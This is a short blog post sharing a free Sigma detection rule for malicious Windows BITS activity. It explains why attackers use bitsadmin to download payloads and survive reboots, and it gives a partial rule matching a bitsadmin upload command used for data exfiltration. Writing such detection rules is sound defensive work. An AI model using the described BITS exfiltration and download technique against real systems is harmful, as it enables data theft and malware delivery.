With this free sigma rule, you can detect BITS activity that is used in a malicious way.
Microsoft BITS (Background Intelligent Transfer Service) is a tool present in all modern Microsoft Windows operating systems. As the name says, you can see it as a “curl” or “wget” tool for Windows.
BITS helps to transfer files between a server and a client but it also has plenty of more interesting features. Such a tool, being always available, is priceless for attackers. They started to use BITS to grab malicious contents from the Internet.
The capability to survive reboots makes it an ideal tool for attackers to drop malicious files into an impacted Windows workstation, especially considering that Microsoft boxes do not have tools like “wget” or “curl” installed by default, and that web browsers (especially those in corporate environments) may have filters and plugins preventing the download of bad files.
Why do I develop my detection rule in a SIGMA format?
Sigma is an open standard for rules that allow you to describe searches on log data in generic form. These rules can be easily converted and applied to many log management or SIEM systems. Support and easy integration with the Elastic stack, ArcSight, Qradar and Splunk, Microsoft Sentinel, and can even be used with grep on the command line.
I’m sure, you know exactly how much hard work it goes into making the good rules, testing them and hunting for the next threat or exploitation technique.
title: Data Exfiltration with Bitsadmin
description: bitsadmin is a microsoft http user agent that can be used in a malicious way
author: francesco mancini
– ‘*bitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY*’
condition: selection 1